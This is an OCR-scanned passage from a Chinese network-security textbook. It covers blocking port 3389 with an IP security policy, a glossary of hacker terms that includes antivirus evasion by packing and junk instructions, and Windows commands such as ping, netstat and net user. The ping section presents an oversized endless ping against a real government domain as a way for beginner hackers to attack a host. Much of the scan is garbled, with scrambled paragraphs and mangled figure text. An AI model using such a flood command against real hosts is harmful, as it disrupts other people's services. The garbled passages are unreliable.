关闭 相应 的 端口 ,可 参考 开启 端口 的 步骤 。 在 图 2-8 中 的 “启动 类 型 "下 拉 列 表 中 ,选择 
“禁用 ”选项 ,然后 单 击 “ 停 止 " 按 钮 。 在 Windows 系统 中 ,都 是 用 端口 对 外 提供 服务 的 ,开启 
和 关闭 服务 ,也 就 是 开启 和 关闭 端口 。 
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| 
| 





启动 参数 0) 











ER 于 LERw ] 
图 2-8 启动 特定 的 服务 
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总 Base Filtering Engine 基本 已 启动 自动 本 地 服务 
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图 2-9 启动 服务 成 功 
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14. 端口 的 限制 


对 于 Windows 用 户 ,可 以 随意 选择 对 服务 器 端口 的 限制 。 在 系统 默认 情况 下 ,许多 没 
用 或 者 有 危险 的 端口 默认 为 开启 ,可 以 选择 将 这 些 端口 关闭 。 

3389 端口 是 一 个 连接 远程 桌面 的 服务 端口 ,如 果 通 过 此 端口 连接 上 了 ,并 知晓 用 户 管 
理 员 的 账号 和 密码 , 便 可 远程 操控 计算 机 。 此 端口 默认 处 于 开启 状态 ,十 分 危险 。 以 下 示例 
是 通过 IP 策略 阻止 访问 该 端口 。 

具体 操作 步骤 如 下 。 

(1) 选择 “控制 面板 ”>“ 系 统 和 安全 ”一 “管理 工具 ”一 “本 地 安全 策略 "命令 。 

(2) 右 击 “IP 安全 策略 ”选项 ,在 弹出 的 快捷 菜单 中 选择 “创建 IP 安全 策略 "命令 , 单 击 
“下 一 步 ” 按 钮 ,如 图 2-10 所 示 。 





peer 
一 软件 限制 全 是 











图 2-10 创建 IP 安全 策略 


(3) 在 出 现 的 窗口 中 ,输入 易 懂 的 名 称 和 描述 信息 。 例 ,名 称 为 “3389 限制 "。 描 述 为 
“限制 运行 3389 端口 ”。 单 击 * 下 一 步 ?按钮 。 

(4) 在 接 下 来 的 界面 中 ,取消 “激活 默认 响应 规则 ” 复 选 框 , 单 击 * 下 一 步 ” 按 钮 。 取 消 
“编辑 属性 ” 复 选 框 。 单 击 “ 完 成 "按钮 。 

(5) 再 次 右 击 “IP 安全 策略 ”选项 ,选择 “管理 IP 筛选 器 列表 和 筛选 器 操作 ”命令 ,在 弹 
出 的 对 话 框 中 (此 时 在 “管理 IP 筛选 器 列表 ?选项 中 ) , 单 击 * 添 加 ”按钮 。 

(6) 在 弹出 的 对 话 框 中 输入 名 称 *3389 端口 筛选 器 ,再 单 击 右 侧 的 “添加 ”按钮 。 单 击 
“下 一 步 ” 按 钮 ,如 图 2-11 所 示 。 

(7) 输入 描述 :“ 限 制 运行 3389 端口 ”, 单 击 “ 镜 像 ” 标 签 , 单 击 “ 下 一 步 ” 按 钮 。 

(8) 接 下 来 ,将 “ 源 地 址 ”设置 为 “任何 IP 地 址 ”, 将 “目标 地 址 ”设置 为 “我 的 IP 地 址 ”, 单 
击 “ 下 一 步 ” 按 钮 。 

(9) 选择 协议 类 型 为 TCP , 单 击 * 下 一 步 ? 按 钮 。 

(10) 设置 IP 协议 端口 为 “到 此 端口 ,再 输入 3389。 单 击 * 下 一 步 按 钮 。 

(11) 取消 “编辑 属性 ” 复 选 框 , 单 击 “ 完 成 ”按钮 。 接 下 来 可 以 看 见 已 创建 的 IP 筛选 器 ， 
再 单 击 “ 确 定 ” 按 钮 。 

(12) 把 选项 切换 至 “管理 筛选 操作 ”窗口 , 单 击 “ 添 加 ”按钮 。 取 消 “ 使 用 “添加 向 导 '” 复 
选 框 ,如 图 2-12 所 示 。 
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所 有 IF 安全 第 柳 共 享 可 用 的 入 选 器 操作 。 
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图 2-12 ”添加 筛选 器 


(13) 设置 筛选 器 操作 为 “阻止 ”, 单 击 * 确 定 ? 按 钮 。 然 后 在 接 下 来 的 界面 中 单 击 “关闭 ” 
按钮 。 

(14) 回 到 初始 界面 ,双击 “IP 安全 策略 ?选项 ,会 切换 出 刚 创 建 的 “3389 限制 ,双击 它 
打开 “属性 ”对 话 框 。 

(15) 在 “规则 ?选项 卡 下 , 单 击 “添加 ”按钮 , 单 击 * 下 一 步 ?按钮 ,如 图 2-13 所 示 。 

(16) 设置 “此 规则 不 指定 隧道 "和 “所 有 网 络 连接 ”选项 , 单 击 “ 下 一 步 " 按 钮 。 

(17) 将 刚 创 建 的 “3389 端口 筛选 器 ?选中 . 单 击 “下 一 步 ?按钮 ,选择 “新 筛选 器 操作 ” 选 
项 , 单 击 “ 下 一 步 " 按 钮 。 

(18) 取消 “编辑 属性 ” 复 选 框 , 单 击 “ 完 成 ”按钮 。 








3389 限 制 限制 运行 3389 基 口 否 2016/1 
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| mes | Ci wp | 
图 2-13 添加 筛选 规则 


(19) 最 后 , 右 击 “3389 限制 ?选项 ,在 弹出 的 快捷 菜单 中 选择 “分 配 ? 选 项 即 可 ,如 图 2-14 
所 示 。 



































图 2-14 添加 IP 筛选 器 成 功 


PP 2.2.3 常用 术语 


Li. 肉鸡 


“肉鸡 ”是 一 种 很 形象 的 比喻 ,比喻 那些 可 以 随意 被 控制 的 计算 机 ,对 方 可 以 是 Windows 
系统 ,也 可 以 是 UNIX/Linux 系统 ,可 以 是 普通 的 个 人 计算 机 ,也 可 以 是 大 型 的 服务 器 ,黑客 
可 以 像 操 作 自 己 的 计算 机 那样 来 操作 它们 ,而 不 被 对 方 所 发 觉 。 


12. 木马 


木马 就 是 那些 表面 上 伪装 成 了 正常 的 程序 ,但 是 当 这 些 被 程序 运行 时 ,就 会 获取 系统 的 
整个 控制 权限 。 有 很 多 黑客 就 是 热衷 与 使 用 木马 程序 来 控制 别人 的 计算 机 ,比如 灰 钥 子 . 黑 
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洞 .PcShare 等 。 


1a. 网 页 木马 

网 页 木马 是 指 表面 上 伪装 成 普通 的 网 页 文件 或 是 将 恶意 的 代码 直接 插入 正常 的 网 页 文 
件 中 , 当 有 人 访问 时 ,网 页 木马 就 会 利用 对 方 系统 或 者 浏览 器 的 漏洞 自动 将 配置 好 的 木马 的 
服务 端 下 载 到 访问 者 的 计算 机 上 来 自动 执行 。 


14. 挂 马 


挂 马 是 指 在 别人 的 网 站 文件 里 面 放 入 网 页 木马 或 者 是 将 代码 潜入 对 方正 常 的 网 页 文件 
里 ,以 使 浏览 者 "中 马 ”。 


和 5. 后 门 

后 门 是 一 种 形象 的 比喻 ,黑客 在 利用 某 些 方法 成 功 地 控制 了 目标 主机 后 ,可 以 在 对 方 的 
系统 中 植 人 特定 的 程序 ,或 者 是 修改 某 些 设置 。 这 些 改动 表面 上 是 很 难 被 察觉 的 ,但 是 黑客 
却 可 以 使 用 相应 的 程序 或 者 方法 来 轻易 地 与 这 台 计 算 机 建立 连接 ,重新 控制 这 台 计 算 机 ,就 
好 像 是 黑客 偷偷 地 配 了 一 把 主人 房间 的 钥匙 ,可 以 随时 进出 而 不 被 主人 发 现 一 样 。 

通常 大 多 数 的 特洛伊 木马 (Trojan Horse) 程 序 都 可 以 被 黑客 用 于 制作 后 门 (Back Door) 。 


lle: IPCS$ 


IPC$ 是 共享 “命名 管道 ”的 资源 , 它 是 为 了 让 进程 间 通信 而 开放 的 命名 管道 ,可 以 通过 
验证 用 户 名 和 密码 获得 相应 的 权限 ,在 远程 管理 计算 机 和 查看 计算 机 的 共享 资源 时 使 用 。 


Er: 弱 口 令 


弱 口 令 是 指 那些 强度 不 够 ,容易 被 猜 解 的 ,类 似 123 .abc 这 样 的 口令 (密码 ) 。 


ls. 默认 共享 


默认 共享 是 Windows 系统 开启 共享 服务 时 自动 开启 所 有 硬盘 的 共享 ,因为 加 了 “$” 符 
号 ,所 以 看 不 到 共享 的 托 手 图 表 , 也 成 为 隐藏 共享 。 


Es. Shell 


Shell 指 的 是 一 种 命令 指 行 环境 ,比如 按键 盘 上 的 Windows 十 R 组 合 键 时 出 现 “ 运 行 ” 对 
话 框 ,在 里 面 输入 cmd 会 出 现 一 个 用 于 执行 命令 的 黑 窗 口 ,这 个 就 是 Windows 的 Shell 执行 
环境 。 


| 10. WebShell 


WebShell 就 是 以 ASP.PHP JSP 或 者 CGI 等 网 页 文件 形式 存在 的 一 种 命令 执行 环境 ， 


@— 


meer 





也 可 以 将 其 称 作 一 种 网 页 后 门 。 黑 客 在 人 侵 了 一 个 网 站 后 ,通常 会 将 这 些 ASP 或 PHP 后 
J] 文件 与 网 站 服务 器 Web 目录 下 正常 的 网 页 文件 混在 一 起 ,然后 就 可 以 使 用 浏览 器 来 访问 
这 些 ASP 或 者 PHP 后 门 ,得 到 一 个 命令 执行 环境 ,以 达到 控制 网 站 服务 器 的 目的 。 其 可 以 
上 传 下 载 文件 .查看 数据 库 、 执 行 任意 程序 命令 等 。 国 内 常用 的 WebShell 有 海 阳 ASP 木 
马 、.Phpspy、c99shell 等 。 


i. 溢出 


确切 地 讲 ,应 该 是 “缓冲 区 溢出 ”。 简 单 的 解释 就 是 程序 对 接收 的 输入 数据 没有 执行 有 
效 的 检测 而 导致 错误 ,后 果 可 能 是 造成 程序 崩溃 或 者 是 执行 攻击 者 的 命令 。 大 致 可 以 分 为 
两 类 : 堆 洲 出 和 栈 溢出 。 


112. 注入 


随 着 B/S 模式 应 用 开发 的 发 展 , 使 用 这 种 模式 编写 程序 的 程序 员 越 来 越 来 越 多 ,但 是 
由 于 程序 员 的 水 平 参差 不 齐 , 相 当 大 一 部 分 应 用 程序 存在 安全 隐患 。 用 户 可 以 提交 一 段 
数据 库 查 询 代 码 ,根据 程序 返回 的 结果 ,获得 某 些 他 想 要 知道 的 数据 ,这 个 就 是 所 谓 的 
SQLinjection, 即 SQL 注入 。 


Ls. 注入 点 


注入 点 是 可 以 实行 注入 的 地 方 ,通常 是 一 个 访问 数据 库 的 连接 。 根 据 注 入 点 数据 库 的 
运行 账号 的 权限 的 不 同 ,用 户 所 得 到 的 权限 也 不 同 。 


114. 内 网 


通俗 地 讲 就 是 局 域 网 ,比如 网 吧 .校园 网 .公司 内 部 网 等 都 属于 此 类 。 查 看 的 IP 地 址 如 
果 是 在 以 下 三 个 范围 之 内 ,就 说 明 是 处 于 内 网 之 中 的 : 10. 0. 0. 0 一 10. 255. 255. 255， 
172. 16. 0. 0~172. 31. 255. 255 ,192. 168. 0. 0 一 192. 168. 255. 255。 


Ls. 外 网 


直接 连 入 Internet( 互 联网 ) ,可 以 与 互联 网 上 的 任意 一 台 计 算 机 互相 访问 ,IP 地 址 不 是 
保留 内 网 IP 地 址 。 


116. 免 杀 


免 杀 就 是 通过 加 壳 、 加 密 、 修 改 特 征 码 、 加 花 指 令 等 技术 来 修改 程序 ,使 其 逃 过 杀毒 软件 
的 查 杀 。 


Lr. 加 过 


加 壳 就 是 利用 特殊 的 算法 ,将 EXE 可 执行 程序 或 者 DLL 动态 连接 库 文件 的 编码 进行 
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改变 (比如 实现 压缩 .加 密 ), 以 达到 缩小 文件 体积 或 者 加 密 程 序 编码 ,甚至 是 躲 过 杀毒 软件 
查 杀 的 目的 。 目 前 较 常 用 的 克 有 UPX、ASPack、PePack、PECompact、UPack 等 。 


18. 花 指令 


花 指 令 就 是 几 句 汇编 指令 ,让 汇编 语句 进行 一 些 跳 转 ,使 杀毒 软件 不 能 正常 地 判断 病毒 
文件 的 构造 。 说 通 1 是 杀毒 软件 是 从 头 到 脚 按 顺 序 来 查找 病毒 。 如 果 把 病毒 的 头 和 脚 
颠倒 位 置 ,杀毒 软 件 就 找 不 到 病毒 了 。 


2.3 ”常用 网 络 安全 命令 


j> 2.3.1 测试 网 络 连接 的 ping 命令 


ping 命令 是 测试 网 络 连接 、 信 息 发 送 和 接收 状况 的 实用 型 工具 ,是 一 个 系统 内 置 的 探测 
[ 具 。 它 所 利用 的 原理 是 网 络 上 的 机 器 都 有 唯一 确定 的 IP 地 址 ,用 1 给 目标 IP 地 址 发 送 
-个 数据 包 ,对 方 就 要 返回 一 个 同样 大 小 的 数据 包 , 根 据 返 回 的 数据 包 , 用 户 可 以 确定 目标 
主机 的 存在 ,可 以 初步 判断 目标 主机 的 操作 系统 等 。 通 过 在 命令 提示 符 下 输入 ping /? 命 
令 , 即 可 查看 ping 命令 的 详细 说 明 ,如 图 2-15 所 示 
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ping [-t] [-a] [-n count] [-1 ] [£1 [-i TIL] [-v TOS] 
[-r count] [-s count] [[- 1 [-k host-list]] 


Control-Break; 
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图 2-15 查看 ping 命令 的 详细 说 明 


网 络 安全 技术 基础 


1. 语法 


ping 命令 的 语法 如 下 。 


ping[-t]l[-a]l[-ncount][-1sizel[-f][-iTE][-vTOS] 
[ -zcount] [- scount] [[—j host—1ist] | [-khost-1list]] 
[一 wtimeout] [-R] [-Ssrcaddr] [-4] [-6] target_name 


常用 的 参数 有 -t、- 


(C1) -ts 


(2) -a 


(4) -1 size: 发 送 包 


Ping 


a、-n count、-] size, 它 们 的 含义 如 下 。 
指定 的 计算 机 直到 中 断 。 


要 中 断 并 退出 ,需要 按 Ctrl 十 C 组 合 键 。 


者 定 对 目的 地 IP 地 址 进行 反 向 名 称 解析 。 如 解析 成 功 ,ping 命令 将 显示 相应 
计算 机 的 主机 名 。 


(3) -n count: 


发 送 count 指定 的 ECHO 数据 包 数 。 默 认 值 为 4。 


2. 典型 示例 
- 般 初 级 黑客 会 使 用 以 下 多 参 


数 命 令 
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目 112.25 
目 112. 
自 112.25. 
自 112. 
玉 目 
目 
目 
目 
目 
目 
目 
目 
目 
| 
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图 2-16 
通常 ,ping 命令 会 反馈 两 种 结果 。 
(1) 请 求 超 时 。 表 示 没 有 收 到 


杂 , 通 常 包括 对 方 装 有 防火 墙 


关 设置 错误 


` 网 络 不 通 等 。 


则 一 般 是 ICMP 不 回 显 。 


(2) 有 “来 自 ……- 
节 是 65 500, 所 以 响应 


的 回复 : 
的 时 间 人 这 也 能 增加 目标 主机 的 CPU 的 使 用 率 等 服务 资源 的 





使 用 ,造成 目标 主机 的 程序 运行 不 正 
的 字 节能 大 于 65 500 风 政 击 效果 为 显 。 


另外 


,图 2- 


16 





Ee 
pn 


含 由 size 指定 的 数据 量 的 ECHO 数据 包 。 默 认为 32B, 最 大 是 65 527B。 


对 目标 主机 进行 攻击 ,如 图 2-16 所 示 。 


sshdministratoryping www.2jg.gov.cn -t -1 65580 


[112 181. 163] 具有 65580 


时 | 上 =62ns TI 


多 参数 使 用 示例 





网 络 设备 返回 的 响应 数据 包 。 出 现 这 个 结果 的 原因 很 复 
并 禁止 ICMP 回 显 、 对 方 已 经 关机 、 本 机 的 IP 设置 不 正确 或 网 
- 般 Ping 目标 域名 ,如 图 2-16 所 示 ,会 出 现 IP 地 址 的 请 求 超时 ， 


”的 情况 , 则 表示 网 络 畅通 ,图 2-16 中 探测 使 用 的 字 


。 当 然 , 目 前 的 ping 命令 是 已 经 打 了 补丁 ,如 果 Ping 


中 最 后 的 TTL(Time To Live, 存 活 时 间 ) 是 指 一 个 数据 包 在 网 络 中 的 生 


第 2 章 nesses BB 











存 期 ,网络 可 通过 它 了 解 网 络 环境 ,辅助 维护 工作 ,通过 TTL 值 可 以 粗略 判断 出 目标 主机 使 
用 的 操作 系统 类 型 ,以 及 本 机 到 达 目 标 主机 所 经 过 的 路 由 数 。 

当 数 据 包 传送 到 一 个 路 由 器 之 后 ,TTL 就 自动 减 1, 如 果 减 到 0 了 还 是 没有 传送 到 目的 
主机 ,那么 就 自动 丢失 ,出现 Request timed out( 请 求 超 时 ) 的 情况 。 默 认 情况 下 ,目标 主机 


操作 系统 和 TTL 值 的 对 应 表 ， 


操作 系统 


如 表 2-3 所 示 。 
表 2-3 不 同 操作 系统 TTL 默认 值 


TTL 默认 值 





Linux 


64 或 255 





UNIX 


255 





Windows NT/2000/XP 


128 





Windows 98 


32 





Windows 7 





j* 2.3.2 查看 网 络 状态 的 netstat 命令 


netstat 是 控制 台 命令 ,是 一 个 监控 TCP/IP 网 络 的 非常 有 用 的 工具 , 它 可 以 显示 路 由 
表 、 实 际 的 网 络 连接 以 及 每 一 个 网 络 接口 设备 的 状态 信息 。netstat 用 于 显示 与 IP、TCP、 
UDP 和 ICMP 协议 相关 的 统计 数据 ,一 般 用 于 检验 本 机 各 端口 的 网 络 状 态 情况 。 

如 果 计 算 机 接收 到 数据 包 时 ,导致 出 错 数据 或 故障 , 则 不 必 感 到 奇怪 ,TCP/IP 可 以 容许 
这 些 类 型 的 错误 ,并 能 够 自动 重 发 数据 包 。 但 如 果 累 计 的 出 错 率 相当 高 , 即 出 错 IP 数据 在 
所 接收 的 所 有 IP 数据 报 中 占 相 当 大 的 百分比 ; 或 者 出 错 率 正 迅速 增加 ,那么 就 应 该 使 用 
netstat 查 一 查 为 什么 会 出 现 这 些 情况 了 。 


一 般 用 netstat -an 来 显示 所 有 连接 的 端口 并 用 数字 表示 。 


1. 语法 
netstat 命令 的 语法 如 下 。 


64 


netstat [~a]l[~e][-n][~o][~pProtocol][—-r][- s][Interval] 


12. 参数 说 明 


(1) -a: 显示 所 有 套 接 字 ,包括 正在 监听 的 。 


(2) -e: 显示 以 太 网 统计 。 此 选项 可 以 与 -s 选项 结合 使 用 。 


(3) -n: 以 网 络 IP 地 址 代替 名 称 ,显示 出 网 络 连 接 情形 。 
(4) -o: 显示 与 每 个 连接 相关 的 所 属 进程 ID(PID) 。 

(5) -p: 显示 建立 相关 连接 的 程序 名 和 PID。 

(6) -r: 显示 核心 路 由 表 . 格 式 同 route -e。 

(7) -s: 显示 每 个 协议 的 统计 。 


weer 








(8) Interval: 重新 显示 选 定 的 统计 ,各 个 显示 间 和 暂停 的 间隔 秒 数 。 按 Ctrl 十 C 组 合 键 停 
止 重 新 显示 统计 。 如 果 省 略 , 则 netstat 将 打印 当前 的 配置 信息 一 次 。 


1a. 典型 示例 


netstat 命令 可 显示 活动 和 TCP 连接 .计算 机 侦 听 的 端口 ,以 太 网 统计 信息 、.IP 路 由 表 、 
IP 统计 信息 。 使 用 时 如 果 不 带 参数 ,netstat 将 显示 活动 的 TCP 连接。 

下 面 再 介绍 几 个 netstat 命令 的 应 用 示例 。 

(1) 如 果 想 要 显示 本 机 活动 的 TCP 连接 ,以 及 计算 机 侦 听 的 TCP 和 UDP 端口 , 则 应 执 
行 netstat -a 命令 。 

(2) 显示 服务 器 活动 的 TCP/IP 连接 , 则 应 执行 netstat -n 命令 或 netstat( 不 带 任何 参 
数 ) 命 令 。 

(3) 显示 以 太 网 统计 信息 和 所 有 协议 的 统计 信息 , 则 应 执行 netstat -s -e 命令 。 

(4) 检查 路 由 表 确 定 路 由 配置 情况 , 则 应 执行 netstat -r -n 命令 。 

网 注意 : 命令 netstat -a -n 同 netstat -an 一 样 ,其 他 类 似 。 


> 2.3.3 工作 组 和 域 的 net 命令 


net 命令 是 一 种 基于 网 络 的 命令 ,该 命令 包含 了 管理 网 络 环 境 、 服 务 、 用 户 、 登 录 等 大 部 
分 重要 的 管理 功能 。 常 见 的 net 命令 有 net view、net user、net use、net start、net stop .net 
share 等 。 下 面 来 介绍 这 些 常用 的 net 子 命令 。 


i. net view 


(1) 作用 : 显示 域 列表 计算 机 列表 或 指定 计算 机 的 共享 资源 列表 。 
(2) 语法 : 


net view [\\computername | /domain[ :domainname]] 


参数 介绍 如 下 。 

中 无 参 : 显示 当前 域 的 计算 机 列表 。 

@ \\computername: 指定 要 查看 其 共享 资源 的 计算 机 。 

@ /domain[ :domainname]: 指定 要 查看 其 可 用 计算 机 的 域 。 


例如 : 
net view \\abcd # 查 看 计算 机 abcd 的 共享 资源 列表 
net view /domain:LOVE # 查看 LOVE 域 中 的 机 器 列表 


12. net User 


(1) 作用 : 添加 或 更 改 用 户 账号 或 显示 用 户 账 号 信息 。 
(2) 语法 : 





net user [username [password | * ] [options]] [/domain] 


参数 介绍 如 下 。 

@ 无 参 : 查看 计算 机 上 的 用 户 账号 列表 。 

@ username: 添加 、 删 除 、 更 改 或 查看 用 户 账号 名 。 

@ password: 为 用 户 账号 分 配 或 更 改 密码 。 

中 x : 提示 输入 密码 。 

@ /domain: 在 计算 机 主 域 的 主 域 控制 器 中 执行 操作 。 


例如 : 
net user administrator # 查 看 用 户 administrator 的 信息 
net user administrator 123456 # 将 administrator 的 密码 改 为 123456 


ls. net use 


(1) 作用 : 连接 计算 机 或 断 开 计算 机 与 共享 资源 的 连接 ,或 显示 计算 机 的 连接 信息 。 
(2) 语法 : 


net use [devicename | * ] [\computername\sharename[\volume]] [password | *] 
[/user:[domainname\ ]username] [[/delete] | [/persistent:{yes | no}]] 
参数 介绍 如 下 。 

@ 无 参 : 列 出 网 络 连接 。 

@ devicename: 指定 要 连接 到 的 资源 名 称 或 要 断 开 的 设备 名 称 。 
@ \computername\sharename: 服务 器 及 共享 资源 的 名 称 。 

@ password: 访问 共享 资源 的 密码 。 

@ * : 提示 输入 密码 。 

@ /user: 指定 进行 连接 的 另外 一 个 用 户 。 

@ domainname: 指定 另 一 个 域 。 

@ username: 指定 登录 的 用 户 名 。 

@ /delete: 取消 指定 网 络 连接 。 

四 /persistent: 控制 永久 网 络 连 接 的 使 用 。 

例如 : 


net use e: \\abcd\\temp # 将 计算 机 abcd 下 共享 的 temp 目录 建 为 网 络 E 盘 显示 在 本 地 
net use e: \\abcd\\temp /delete  # 断 开 连 接 


14. net start 


(1) 作用 : 启动 服务 ,或 显示 已 启动 服务 的 列表 。 
(2) 语法 : 


net start service 
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例如 ,用 该 命令 查看 已 启动 的 服务 ,如 图 2-17 所 示 。 





画 管 至 员 : C\Windows\system32\cmd.exe hy 


\Adninistratorm 
启 Windows 服务 : 


Alipay payment client ity service 
Alipay security busin rvice 
Application Host Helper Service 
Background Intelligent Transfer Service 
Base Pilt 

Bluetooth S$' 

Bluetooth Support Service 

CAJ Service Host 

CNG Key Isolation 

COM+ Event System 

Credential Manager 

Cryptographic Services 

DCOM Server Process Launcher 





图 2-17 查看 已 启动 的 服务 


5. net stop 
(1) 作用 : 停止 Windows 网 络 服务 


(2) 语法 : 





net stop service 


参数 介绍 如 下 。 
service 包括 下 列 服务 : Alerter( 警 报 )、Client Service for Netware( Netware 客户 端 服 


务 ) .Clipbook Server (剪贴 德 服 务 器 )、Computer Browser (计算 机 浏览 、Directory 
Replicator( 目 录 复 制 器 )、FTP Publishing Service(FTP 发 行 服 务 )、 ee 使 )、Net 
Logon( 网 络 登录 ) 、Remote Access Server( 远 程 访 问 服务 器 )、Server( 服 务 器 ) 等 。 


6. net share 


(1) 作用 : 创建 ,删除 或 显示 共享 资源 。 

(2) 语法 : 

net share sharename 

net share sharename = drive:path [/users:number | /unlimited] [/remark:"text"] 


net share sharename [/users:number | unlimited] [/remark:"text"] 
net share {sharename | drive:path} /delete 


参数 介绍 如 下 。 

无 参 : 显示 本 地 计算 机 上 所 有 共享 资源 的 信息 。 
sharename: 只 显示 共享 资源 的 网 络 名 称 。 

@ drive:path: 指定 共享 目录 的 绝对 路 径 。 

@ /users:number: 设置 可 同时 访问 共享 资源 的 最 大 用 户 数 。 
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@ /unlimited: 不 限制 同时 访问 共享 资源 的 用 户 数 。 

@ /remark:"text": 添加 关于 资源 的 注释 ,注释 文字 用 引号 引 住 。 
@ /delete: 停止 共享 资源 。 

例如 : 


net share print $ /delete 上 停止 print $ 的 共享 


PP 2.3.4 远程 登录 的 telnet 命令 


Telnet 协议 是 TCP/IP 协议 族 中 的 一 员 ,是 Internet 远程 登录 服务 的 标准 协议 和 主要 
方式 。 它 为 用 户 提 供 了 在 本 地 计算 机 上 完成 远程 主机 工作 的 能 力 。 在 终端 使 用 者 的 计算 机 
上 使 用 Telnet 程序 ,用 它 连 接 到 服务 器 。 终 端 使 用 者 可 以 在 Telnet 程序 中 输入 命令 ,这 些 
命令 会 在 服务 器 上 运行 ,就 像 直 接 在 服务 器 的 控制 台 上 输入 一 样 。 可 以 在 本 地 就 能 控制 服 
务 器 。 要 开始 一 个 Telnet 会 话 , 必 须 输入 用 户 名 和 密码 来 登录 服务 器 。Telnet 是 常用 的 远 
程控 制 Web 服务 器 的 方法 。 

telnet 命令 的 语法 如 下 。 

telnet IP 地 址 /主机 名 称 端口 号 

例如 ,telnet 192. 168. 1. 11 80 命令 如 果 执 行 成 功 , 则 将 从 目标 主机 192. 168. 1. 11 上 ,得 
到 Login 提示 符 。Telnet 默认 的 端口 号 是 23 号 ,但 示例 中 用 Telnet 来 模拟 登录 到 80 端口 
的 服务 器 上 ,如 图 2-18 所 示 。 





画 Telnet 192.168.1.11 
Microsoft Windows TS 本 TD 


版 权 所 有 “ce 2899 Microsoft Corporation。 保 留 所 有 权利 


lc: Users\hdministrator>telnet 192.168.1.11 89 
正在 连接 192.168.1.11...。 





图 2-18 Telnet 连接 示例 


当成 功 连接 远程 系统 时 ,将 显示 登录 信息 并 提示 输入 用 户 名 和 口令 。 如 果 登 录 信 息 正 
确 , 则 可 成 功 登 录 并 在 远程 系统 上 工作 。 在 telnet 提示 符 后 可 输入 很 多 命令 ,用 来 控制 
telnet 会 话 过 程 。 在 telnet 提示 下 输入 “?”, 屏 幕 显示 telnet 命令 的 帮助 信息 。 


PP 2.3.5 传送 文件 的 ftp 命令 


FTP 用 于 Internet 上 的 文件 的 双向 传送 。 同 时 , 它 也 是 一 个 应 用 程序 (Application ) 。 
基于 不 同 的 操作 系统 有 不 同 的 FTP 应 用 程序 ,而 所 有 这 些 应 用 程序 都 遵守 同一 种 协议 以 传 
送 文件 。 在 FTP 的 使 用 中 ,用 户 经 常 遇 到 两 个 概念 : 下 载 (Download) 和 上 传 (Upload)。 下 
载 文件 就 是 从 远程 主机 复制 文件 至 自己 的 计算 机 上 ; 上 传 文件 是 将 文件 从 自己 的 计算 机 中 复 
制 至 远程 主机 。 用 Internet 语言 来 说 ,用 户 可 通过 客户 程序 向 (从 ) 远 程 主机 上 传 (下 载 ) 文 件 。 








四 一 -一 一 
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FTP 的 文件 传送 有 两 种 方式 : ASCII、 二 进 制 。 

(1) ASCII 传输 方式 。 假 定 用 户 正 在 复制 的 文件 包含 的 简单 ASCII 码 文本 ,如 果 在 远 
程 机 器 上 运行 的 不 是 UNIX, 当 文件 传输 时 ,通常 会 自动 地 调整 文件 的 内 容 以 便于 把 文件 解 
释 成 男 外 那 台 计算 机 存储 文本 文件 的 格式 。 

(2) 二 进 制 传输 模式 。 常 常 有 这 样 的 情况 ,用 户 正 在 传送 的 文件 包含 的 不 是 文本 文件 ， 
它们 可 能 是 程序 .数据 库 . 字 处 理 文件 或 者 压缩 文件 。 在 复制 任何 非 文本 文件 之 前 ,用 
binary 命令 告诉 服务 器 逐 字 复 制 。 

在 二 进 制 传输 中 会 保存 文件 的 位 序 , 以 便 原 始 文件 和 复制 的 文件 是 逐 位 对 应 的 。 即 使 
目的 地 机 器 上 包含 位 序列 的 文件 是 没 意 义 的 。 例 如 ,Macintosh 以 二 进 制 方式 传送 可 执行 文 
件 到 Windows 在 对 方 系 ,此 文件 不 能 执行 。 

如 在 ASCII 方式 下 传输 二 进 制 文件 ,即使 不 需要 也 仍 会 转译 ,这 会 损坏 数据 。ASCII 方 
式 一 般 假 设 每 一 字符 的 第 一 有 效 位 无 意义 ,因为 ASCII 字符 组 合 不 使 用 它 。 如 果 传 输 二 进 
制 文件 ,所 有 的 位 都 是 重要 的 。 

ftp 命令 行 的 语法 如 下 。 








ftp -v-d-i-n-g[ 主 机 名 ] 

参数 介绍 如 下 。 

(1) -v: 显示 远程 服务 器 的 所 有 响应 信息 
(2) -d: 使 用 调试 方式 。 






(3) -n: 禁止 在 初始 连接 时 自动 登录 。 
(4) -g: 取消 全 局 文件 名 


其 运行 环境 如 图 2-19 所 示 


画 管理 员 : CAWindows\system32\emdexe -fp so [= .© mE 
trator ftp 
命令 为 : 


delete literal pronpt 
put 
pud 


disconnect ir quit 


get quote 

glob ir recu 

hash s remotehelp 

help renane 
rndir 





图 2-19 ”ftp 命令 的 运行 环境 


j> 2.3.6 查看 网 络 配置 的 ipconfig 命令 


ipconfig 是 调试 计算 机 网 络 的 常用 命令 ,通常 使 用 它 显 示 计算 机 中 网 络 适配器 的 IP 地 
址 、 子 网 掩 码 及 默认 网 关 。 其 实 这 只 是 ipconfig 的 不 带 参 数 用 法 ,而 它 的 带 参数 用 法 ,在 网 
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络 应 用 中 也 是 相当 不 错 的 。 

可 以 在 命令 提示 符 窗口 中 ,用 ipconfig/? 命 令 查 看 命令 的 用 法 。 

主要 参数 的 功能 如 下 。 

(1) all: 显示 本 机 TCP/IP 配置 的 详细 信息 。 

(2) release: DHCP 客户 端 手工 释放 IP 地 址 。 

(3) renew: DHCP 客户 端 手工 向 服务 器 刷新 请 求 。 

(4) flushdns: 清除 本 地 DNS 缓存 内 容 。 

(5) displaydns: 显示 本 地 DNS 内 容 。 

(6) registerdns: DNS 客户 端 手工 向 服务 器 进行 注册 。 

(7) showclassid: 显示 网 络 适配器 的 DHCP 类 别 信息 。 

(8) setclassid: 设置 网 络 适配器 的 DHCP 类 别 。 

(9) renew Local Area Connection: 更 新 “本 地 连接 ”适配器 的 由 DHCP 分 配 IP 地 址 的 
配置 。 

(10) showclassid Localx : 显示 名 称 以 Local 开头 的 所 有 适配器 的 DHCP 类别 ID。 

(11) setclassid Local Area Connection TEST: 将 “本 地 连接 ”适配器 的 DHCP 类 别 ID 
设置 为 TEST。 


2.4 创建 虚拟 测试 环境 


在 测试 和 学 习 网 络 安全 工具 和 配置 操作 时 ,都 不 会 拿 实体 计算 机 来 尝试 ,而 是 在 计算 机 
中 搭建 虚拟 环境 , 即 用 虚拟 机 创建 一 个 操作 系统 。 该 系统 可 以 与 外 界 独立 ,但 与 已 经 存在 的 
系统 建立 网 络 关系 ,从 而 方便 使 用 某 些 网 络 工 具 进 行 网 络 安全 攻防 ,如 果 这 些 工 具 对 虚拟 机 
造成 了 破坏 ,也 可 以 快速 恢复 , 且 不 会 影响 自己 本 来 的 计算 机 系统 ,使 操作 更 安全 。 


PP 2.4.1 安装 VMware 虚拟 机 


